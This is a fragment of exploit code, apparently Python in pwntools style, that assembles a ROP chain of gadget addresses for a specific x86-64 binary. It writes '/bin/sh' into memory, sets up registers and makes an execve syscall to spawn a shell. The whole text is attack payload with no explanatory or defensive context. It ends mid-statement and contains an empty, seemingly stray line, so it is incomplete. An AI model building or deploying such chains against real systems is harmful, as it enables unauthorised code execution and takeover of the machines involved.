payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44c830)+p64(0x41cfd8)
# 0x000000000041cfd8: pop rcx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x416f25)
# 0x0000000000416f25: mov qword ptr [rdi + 0x840], rcx; pop rbp; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x401d97)+p64(0x427274)
# 0x0000000000427274: lea eax, [rdi - 1]; ret; 
payload += p64(0x417113)
# 0x0000000000417113: mov edx, dword ptr [rsp]; call rax; 
payload += b''
# 0x0000000000401d96: pop rdi; pop rbp; ret; 
payload += p64(0x0)+p64(0x41ffc1)
# 0x000000000041ffc1: pop rsi; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3c)+p64(0x427274)
# 0x0000000000427274: lea eax, [rdi - 1]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x44d070)+p64(0x406cab)
# 0x0000000000406cab: syscall; ret; 
payload +=
